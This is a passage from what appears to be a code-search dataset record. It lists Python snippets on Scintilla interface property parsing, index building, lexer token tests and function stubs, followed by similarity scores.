(properties.get(propname,(None,None))[0], name)\n\n\t\t\t\telse:\n\t\t\t\t\tfunctions[name] = features\n\n\tpropertiesCopy = properties.copy()\n\tfor propname, (getterName, setterName) in propertiesCopy.items():\n\t\tgetter = getterName and f.features[getterName]\n\t\tsetter = setterName and f.features[setterName]\n\n\t\tgetterValue, getterIndex, getterIndexName, getterType = 0, None, None, None\n\t\tsetterValue, setterIndex, setterIndexName, setterType = 0, None, None, None\n\t\tpropType, propIndex, propIndexName = None, None, None\n\n\t\tisok = (getterName or setterName) and not (getter is setter)\n\n\t\tif isok and getter:\n\t\t\tif getter['Param2Type'] == 'stringresult':\n\t\t\t\tgetterType = getter['Param2Type']\n\t\t\telse:\n\t\t\t\tgetterType = getter['ReturnType']\n\t\t\tgetterType = ConvertEnu(getterType)\n\t\t\tgetterValue = getter['Value']\n\t\t\tgetterIndex = getter['Param1Type'] or 'void'\n\t\t\tgetterIndexName = getter['Param1Name']\n\n\t\t\tisok = ((getter['Param2Type'] or 'void') == 'void') or (getterType == 'stringresult')\n\n\t\tif isok and setter:\n\t\t\tsetterValue = setter['Value']\n\t\t\tsetterType = ConvertEnu(setter['Param1Type']) or 'void'\n\t\t\tsetterIndex = 'void'\n\t\t\tif (setter['Param2Type'] or 'void') != 'void':\n\t\t\t\tsetterIndex = setterType\n\t\t\t\tsetterIndexName = setter['Param1Name']\n\t\t\t\tsetterType = ConvertEnu(setter['Param2Type'])\n\n\t\t\tisok = (setter['ReturnType'] == 'void') or (setter['ReturnType'] == 'int' and setterType=='string')\n\n\t\tif isok and getter and setter:\n\t\t\tisok = ((getterType == setterType) or (getterType == 'stringresult' and setterType == 'string')) and (getterIndex == setterIndex)\n\n\t\tpropType = getterType or setterType\n\t\tpropIndex = getterIndex or setterIndex\n\t\tpropIndexName = getterIndexName or setterIndexName\n\n\t\tif isok:\n\t\t\t# do the types appear to be useable? THIS IS OVERRIDDEN BELOW\n\t\t\tisok = (propType in ('int', 'position', 'line', 'pointer', 'colour', 'colouralpha', 'bool', 'string', 'stringresult')\n\t\t\t\tand propIndex in ('void','int','position','line','string','bool'))\n\n\t\t\t# getters on string properties follow a different protocol with this signature\n\t\t\t# for a string getter and setter:\n\t\t\t# get int funcname(void,stringresult)\n\t\t\t# set void funcname(void,string)\n\t\t\t#\n\t\t\t# For an indexed string getter and setter, the indexer goes in\n\t\t\t# wparam and must not be called 'int length', since 'int length'\n\t\t\t# has special meaning.\n\n\t\t\t# A bool indexer has a special meaning. It means \"if the script\n\t\t\t# assigns the language's nil value to the property, call the\n\t\t\t# setter with args (0,0); otherwise call it with (1, value).\"\n\t\t\t#\n\t\t\t# Although there are no getters indexed by bool, I suggest the\n\t\t\t# following protocol: If getter(1,0) returns 0, return nil to\n\t\t\t# the script. 
Otherwise return getter(0,0).\n\n\n\t\tif isok:\n\t\t\tproperties[propname] = {\n\t\t\t\t\"GetterValue\" : getterValue,\n\t\t\t\t\"SetterValue\" : setterValue,\n\t\t\t\t\"PropertyType\" : propType,\n\t\t\t\t\"IndexParamType\" : propIndex,\n\t\t\t\t\"IndexParamName\" : propIndexName,\n\t\t\t\t# The rest of this metadata is added to help generate documentation\n\t\t\t\t\"Category\" : (getter or setter)[\"Category\"],\n\t\t\t\t\"GetterName\" : getterName,\n\t\t\t\t\"SetterName\" : setterName,\n\t\t\t\t\"GetterComment\" : CommentString(getter),\n\t\t\t\t\"SetterComment\" : CommentString(setter)\n\t\t\t}\n\t\t\t#~ print(properties[propname])\n\n\t\t\t# If it is exposed as a property, the constant name is not picked up implicitly\n\t\t\t# (because the name is different) but its constant should still be exposed.\n\t\t\tif getter:\n\t\t\t\tconstants.append( (\"SCI_\" + getterName.upper(), getter))\n\t\t\tif setter:\n\t\t\t\tconstants.append( (\"SCI_\" + setterName.upper(), setter))\n\t\telse:\n\t\t\t# Cannot parse as scriptable property (e.g. not symmetrical), so export as functions\n\t\t\tdel(properties[propname])\n\t\t\tif getter:\n\t\t\t\tfunctions[getterName] = getter\n\t\t\tif setter:\n\t\t\t\tfunctions[setterName] = setter\n\n\tfunclist = list(functions.items())\n\tfunclist.sort()\n\n\tproplist = list(properties.items())\n\tproplist.sort()\n\n\tconstants.sort()\n\n\treturn (constants, funclist, proplist)", "def add_index(self, name, func):\n assert name not in self.indices\n info_name = 'index:%s:%s' % (self.info['name'], name)\n info = self.store._get_info(info_name, index_for=self.info['name'])\n index = Index(self, info, func)\n self.indices[name] = index\n if IndexKeyBuilder:\n self._index_keys = IndexKeyBuilder(self.indices.values()).build\n return index", "def test_symbol():\n token = Token(\"+\", TokenInfo(\"<stdin>\", 0, 1, \" ++\"))\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"+\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.ADD\n assert token.info.line == \" ++\"\n\n token += \"+\"\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n token = token()\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n with pytest.raises(LythSyntaxError) as err:\n token += \"5\"\n\n assert token.info.offset == 1\n assert token.info.filename == \"<stdin>\"\n assert token.lexeme == \"++\"\n assert token.info.lineno == 0\n assert token.symbol == Symbol.INC\n assert token.info.line == \" ++\"\n\n assert err.value.msg is LythError.MISSING_SPACE_AFTER_OPERATOR\n assert err.value.filename == \"<stdin>\"\n assert err.value.lineno == 0\n assert err.value.offset == 1\n assert err.value.line == \" ++\"\n\n assert repr(token) == \"Token(INC, '++', 0, 1)\"\n assert str(token) == \"INC: '++'\"", "def make_function_stubs(self):\n res = \"\"\n for node in self.description.declarations() + self.description.definitions():\n if isinstance(node.type,pdl.TypeFunction):\n res += \"def {}({}):\\n 
pass\".format(node.name, \", \".join(map(\n lambda t: \"{}\".format(t.name), node.type.args)) )\n\n return res", "def factory_functions(self, route, docstring=\"\"):\n def generic_function(**kwargs):\n return self._get(route, params=kwargs)\n generic_function.__doc__ = docstring\n return generic_function", "def __call__(self, function: FuncStrArg):\n self._add_attr(function)\n return function", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)" ]
[ "0.6120692", "0.6099593", "0.5789169", "0.5777273", "0.5620227", "0.56047827", "0.55795795", "0.55412346", "0.55109686", "0.54903716", "0.5484314", "0.5438553", "0.5425026", "0.54227895", "0.5353313", "0.5350989", "0.53228265", "0.53207916", "0.5307697", "0.5287561", "0.5281127", "0.5280825", "0.52747303", "0.5257802", "0.52553564", "0.52550393", "0.5250104", "0.5248134", "0.52470785", "0.5228019", "0.5216738", "0.52088207", "0.51950306", "0.5191963", "0.5186365", "0.5178229", "0.51750886", "0.5148772", "0.51465863", "0.5138241", "0.51214576", "0.51143366", "0.5108677", "0.51079667", "0.5102555", "0.5102401", "0.50881034", "0.50783306", "0.5071918", "0.50648016", "0.5060347", "0.50579053", "0.50555634", "0.5038251", "0.5037413", "0.5027613", "0.502687", "0.5024428", "0.50233424", "0.5018096", "0.50123173", "0.49973443", "0.49909964", "0.4990763", "0.49894455", "0.4986234", "0.49859953", "0.49760732", "0.4975027", "0.4972083", "0.49667755", "0.49600118", "0.49522442", "0.49493355", "0.49351233", "0.49344134", "0.4931076", "0.4931076", "0.4923678", "0.49169096", "0.49149737", "0.4911118", "0.49086535", "0.49066395", "0.49033085", "0.4902465", "0.4902322", "0.48781157", "0.48768586", "0.48766613", "0.48747414", "0.48744065", "0.4872286", "0.48693642", "0.48665452", "0.48630428", "0.48630047", "0.48576513", "0.48549813", "0.48514476", "0.4846257" ]
0.0
-1
Tests basic pointwise arithmetic on two-dimensional data
def test_flat(self, expr, result, mode):
    i, j = dimify('i j')
    # Two 2-D symbolic arrays initialised to the constants 2.0 and 3.0.
    a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)
    b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)
    # In 'indexed' mode the symbols are index expressions, so recover the
    # underlying functions before running the operator and inspecting data.
    fa = a.base.function if mode == 'indexed' else a
    fb = b.base.function if mode == 'indexed' else b
    # Build the pointwise equation from its string form, execute it, and
    # check the computed data against the expected result.
    eqn = eval(expr)
    Operator(eqn)(fa, fb)
    assert np.allclose(fa.data, result, rtol=1e-12)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z", "def TestFunc1(x):\r\n return 12*x[0]*x[0] + 4*x[1]*x[1] - 12*x[0]*x[1] + 2*x[1]", "def test_two_round_data_points(self):\r\n values = [2, 3]\r\n expect_mean_result = 2.5\r\n expected_sd_result = .5\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertEqual(expect_mean_result, result['mean_result'])\r\n self.assertEqual(expected_sd_result, result['sd_result'])", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def test_results():\n x = 0.5\n np.testing.assert_almost_equal(nbf.sum_x_n_calc(\n x, z_n, k_n_1), npf.sum_x_n_calc(x, z_n, k_n_1))", "def test_sum_squares(self):\n fun = get_problem('sum_squares', self.dimension)\n self.assertEqual(fun(self.array), 0.0)", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_mul(x, y):\n\n assert mul(x, y) == pytest.approx(mul(y, x))", "def TestFunc2(x):\r\n return 10*(-0.02*x[0] + 0.5*x[0]*x[0] + x[1])**2 \\\r\n + 128*(-0.02*x[0] + 0.5*x[0]*x[0] - x[1]/4) \\\r\n - (8e-5)*x[0]", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 
'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_scalar(self):\r\n x = scalar('x')\r\n p = ptp(x)\r\n f = theano.function([x], p)\r\n\r\n y = numpy.asarray(rand() * 2000 - 1000, dtype=config.floatX)\r\n result = f(y)\r\n numpyResult = numpy.ptp(y)\r\n\r\n self.assertTrue(numpy.array_equal(result, numpyResult))", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def check_evaluation_points(x, y):\n assert x.ndim == y.ndim == 1\n assert x.shape == y.shape\n assert x.dtype == y.dtype == np.float64", "def test_local_dot22_to_dot22scalar():\r\n A = 
T.dmatrix()\r\n mode = theano.compile.mode.get_default_mode()\r\n opt = theano.tensor.opt.in2out(\r\n theano.tensor.blas.local_dot22_to_dot22scalar)\r\n mode = mode.__class__(optimizer=opt)\r\n\r\n x = T.dscalar()\r\n y = T.dscalar()\r\n z = T.dscalar()\r\n # make sure to don't have dimshuffle as we don't opt those cases\r\n m = T.dmatrix()\r\n r = T.drow()\r\n for idx, node in enumerate([\r\n #Old working cases\r\n T.mul(_dot22(A, A), x),\r\n T.mul(_dot22(A, A), x, y),\r\n T.mul(_dot22(A, A), x, r),\r\n T.mul(_dot22(A, A), m, x),\r\n T.mul(_dot22(A, A), x, m),\r\n T.mul(_dot22(A, A), x, (m * y)),\r\n T.mul(_dot22(A, A), (m * y), x),\r\n T.mul(_dot22(A, A), x, (r * y)),\r\n T.mul(_dot22(A, A), (r * y), x),\r\n T.mul(_dot22(A, A), (x * y), (m * x)),\r\n T.mul(_dot22(A, A), (r * y), (y * x)),\r\n\r\n # Case that was raising an assert that is fixed in gh-1507\r\n T.mul(_dot22(A, A), (m * y), m),\r\n T.mul(_dot22(A, A), m, (m * y)),\r\n T.mul(_dot22(A, A), (r * y), (m * x)),\r\n\r\n # assert fixed in gh-1507 and opt case added in gh-1515\r\n T.mul(_dot22(A, A), (m * y * z), m),\r\n T.mul(_dot22(A, A), m, (m * y * z)),\r\n\r\n # Opt case added in gh-1515\r\n T.mul(_dot22(A, A), T.mul(m, y, z), m),\r\n T.mul(_dot22(A, A), m, T.mul(m, y, z)),\r\n\r\n #Case that opt later in gh-1515\r\n T.mul(_dot22(A, A), (r * m), (m * x)),\r\n ]):\r\n node2 = theano.tensor.blas.local_dot22_to_dot22scalar.transform(\r\n node.owner)\r\n assert node2\r\n f = theano.function([x, y, z, m, r, A], node,\r\n mode=mode, on_unused_input='ignore')\r\n f(.1, .2, .3, [[1, 2], [3, 4]], [[5, 6]], [[7, 8], [9, 10]])", "def test_mul(x, y):\n\n assert mul(x, y) == mul(y, x)", "def test_basic_calculation(self):\n expected_result = np.array(\n [\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n [[0.5, 0.5, 0.0], [0.5, 0.5, 0.4], [0.9, 0.5, 0.4]],\n ],\n dtype=np.float32,\n )\n result = calculate_sleet_probability(self.rain_prob_cube, self.snow_prob_cube)\n self.assertArrayAlmostEqual(result.data, expected_result)\n self.assertTrue(result.dtype == np.float32)", "def test_multidimensional_operation(self):\n # start with something (1, 2, 3)\n data = np.array([[[0.0, 1.0, 2.0], [3.0, 4.0, 5.0]]])\n\n # split 1st dim (2, 2, 3)\n coefficients = np.ones((1, 2)) / 2\n expected = np.array(\n [[[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]], [[0.0, 0.5, 1.0], [1.5, 2.0, 2.5]]]\n )\n actual = Adaptor.convert_with_coefficients(data, coefficients, 0)\n np.testing.assert_allclose(actual, expected)\n\n # sum 3rd dim (2, 2, 1)\n coefficients = np.ones((3, 1))\n expected = np.array([[[1.5], [6.0]], [[1.5], [6.0]]])\n actual = Adaptor.convert_with_coefficients(actual, coefficients, 2)\n np.testing.assert_allclose(actual, expected)", "def test_alpine1(self):\n fun = get_problem('alpine1', self.dimension, -10.0, 10.0)\n self.assertEqual(fun(self.array), 0.0)", "def test_safe_sum_p_log_p(self):\r\n m = array([2, 4, 0, 8])\r\n self.assertEqual(safe_sum_p_log_p(m, 2), 2 * 1 + 4 * 2 + 8 * 3)", "def test_suite():\r\n test(slope(5, 3, 4, 2) == 1.0)\r\n test(slope(1, 2, 3, 2) == 0.0)\r\n test(slope(1, 2, 3, 3) == 0.5)\r\n test(slope(2, 4, 1, 2) == 2.0)", "def test_equal12():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True], [False, False, False], [True, True, False]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n 
obj.run(res=res, x=x, y=y)", "def test02(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n cr = bcolz.eval(\"a * b\", rootdir=self.rootdir)\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_adding(self):\n adder = Adder()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i + j, adder.calc(j, i))", "def test_coords():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n\n return x, y", "def test12(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a), bcolz.carray(b, rootdir=self.rootdir)\n cr = bcolz.eval(\"c + 2 * d - 3\", out_flavor='numpy')\n nr = a + 2 * b - 3\n # print \"bcolz.eval ->\", cr, type(cr)\n # print \"numpy ->\", nr\n self.assertTrue(type(cr) == np.ndarray)\n assert_array_equal(cr, nr, \"eval does not work correctly\")", "def CustomMathTest(): \n \n def CheckEqual(iterator):\n return len(set(iterator)) <= 1\n \n print(\"\")\n print(\" ..Testing.. \")\n print(\"\")\n \n Tests = []\n\n #Setup\n c = [1,2,3,nan,3]\n c2 = ma.masked_array(c,isnan(c))\n #Python has a less-comfortable handling of missing values.\n c3 = [2,3,-1,4,0]\n \n\n print(\"Testing MeanNa...\")\n Expected = [1.0, 2.0, 3.0, 2.25, 3.0]\n Actual = MeanNa(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n print(\"Testing Catch...\")\n Expected = [0,1,.5,0]\n Actual = [Catch(.4),Catch(.6),Catch(.4,.3),Catch(.4,.1)]\n print(Expected)\n print(Actual)\n print(Actual==Expected)\n Tests.append((Actual==Expected))\n print(\"\")\n \n print(\"Testing Influence...\")\n Expected = [array([ 0.88888889]), array([ 1.33333333]), array([ 1.]), array([ 1.33333333])]\n Actual = Influence(GetWeight(c2))\n print(Expected)\n print(Actual)\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True\n print(Flag)\n Tests.append(Flag) \n print(\"\")\n \n print(\"Testing ReWeight...\")\n Expected = [0.08888888888888889, 0.17777777777777778, 0.26666666666666666, 0.2, 0.26666666666666666]\n Actual = ReWeight(c2)\n print(Expected)\n print(Actual)\n print(CheckEqual(Actual==Expected))\n Tests.append(CheckEqual(Actual==Expected))\n print(\"\")\n \n Votes = array([[1,1,0,0], \n [1,0,0,0],\n [1,1,0,0],\n [1,1,1,0],\n [0,0,1,1],\n [0,0,1,1]])\n \n Votes = ma.masked_array(Votes,isnan(Votes))\n \n print(\"Testing ReverseMatrix...\")\n Expected = array([[0, 0, 1, 1],\n [0, 1, 1, 1],\n [0, 0, 1, 1],\n [0, 0, 0, 1],\n [1, 1, 0, 0],\n [1, 1, 0, 0]])\n Actual = ReverseMatrix(Votes)\n print(Expected)\n print(Actual)\n Flag=False\n if(sum(Expected==Actual)==24):\n Flag=True\n print(Flag)\n Tests.append(Flag)\n print(\"\") \n \n print(\"Testing WeightedPrinComp...\")\n Expected = array([-0.81674714, -0.35969107, -0.81674714, -0.35969107, 1.17643821, 1.17643821])\n Actual = WeightedPrinComp(Votes)[1]\n Out = []\n Flag=False\n for i in range(len(Actual)): #rounding problems require an approximation\n Out.append( (Actual[i]-Expected[i])**2)\n if(sum(Out)<.000000000001):\n Flag=True \n print(Flag)\n Tests.append(Flag) \n print(\"\") \n \n print(\" *** TEST RESULTS ***\")\n print(Tests)\n print(CheckEqual(Tests))\n \n return(CheckEqual(Tests))", "def test_equal13():\n x = np.array([[[[[[True, False, 
True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_xy(self):\n x = np.array([[1,3], [2,8], [1,3]])\n y = np.array([1,1,-1])\n lro = LogisticRegressionOptimiser(x,y)\n expected = np.array([[1,3], [2,8], [-1,-3]])\n for i in 0,1,2:\n for j in 0,1:\n self.assertEqual(lro.xy[i][j], expected[i][j])", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def test_binops(self):", "def test__point_right_addition__given_vector_and_point__return_correct_point():\n assert Vector((0, 1, 2)) + Point((3, 4, 5)) == Point((3, 5, 7))", "def test01(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n if self.rootdir:\n dirc, dird = self.rootdir+'.c', self.rootdir+'.d'\n else:\n dirc, dird = None, None\n c = bcolz.carray(a, rootdir=dirc)\n d = bcolz.carray(b, rootdir=dird)\n cr = bcolz.eval(\"c * d\")\n nr = a * b\n # print \"bcolz.eval ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"eval does not work correctly\")", "def test_analytical_vs_numerical():\n pass", "def test_multiplying(self):\n multiplier = Multiplier()\n\n for i in range(-10, 10):\n for j in range(-10, 10):\n self.assertEqual(i*j, multiplier.calc(j, i))", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_single_quadrant(self):", "def test_scalar_multiplication(self):\n\n a1 = tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 1, -2, 3, -4)\n a2 = a1 * 3.5\n a3 = a1 * 0.5\n\n self.assertEqual(a2,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 3.5, -7, 10.5, -14))\n self.assertEqual(a3,\n tuples.Tuple([\"a\", \"b\", \"c\", \"d\"], 0.5, -1, 1.5, -2))", "def wilcoxon_test(data):\n n = len(data)\n print(n)\n absolute_values = []\n for d in data:\n absolute_values.append((d, np.abs(d)))\n\n absolute_values.sort(key=lambda x: x[1])\n ret = []\n for i, d in enumerate(absolute_values):\n ret.append((i + 1, d[0], d[1]))\n\n t_plus = 0\n t_minus = 0\n for tup in ret:\n if tup[1] < 0:\n t_minus += tup[0]\n else:\n t_plus += tup[0]\n\n w = min(t_plus, t_minus)\n\n E_w = n * (n + 1) / 4\n se = np.sqrt(n * (n+1) * (2*n+1)/24)\n z = (w - E_w) / se\n p_value = 2. 
* norm.sf(abs(z)) # two sided test\n\n return z, p_value", "def test_many_round_data_points(self):\r\n values = [1, 1, 3, 5, 8, 3, 9, 2, 6, 2]\r\n expect_mean_result = 4\r\n expected_sd_result = 2.72029\r\n result = multipoint_mean_sd(values)\r\n\r\n self.assertEqual(expect_mean_result, result['mean_result'])\r\n self.assertAlmostEqual(expected_sd_result, result['sd_result'], 4)", "def test_equal15():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = x\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_equal9():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([True, False, True])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_positive_slope(self):\n slopes = []\n for i in range(100):\n neighborhood, pc = create_point_cloud_in_plane_and_neighborhood()\n slopes += list(EigenValueVectorizeFeatureExtractor().extract(pc, neighborhood, None, None, None)[6])\n np.testing.assert_array_less(np.zeros_like(slopes), slopes)", "def test_doubles(self):\n self.assertEqual(doubles(self.TestData), 3)\n self.assertEqual(doubles(array([0,3,4])), 0)\n self.assertEqual(doubles(array([2])), 1)", "def test_point_within_dimensions_true():\n point = np.array([10, 20])\n image_dimensions = np.array([100, 100])\n assert point_within_dimensions(point, image_dimensions)", "def test_shift_point(self):\n point = (0,0)\n 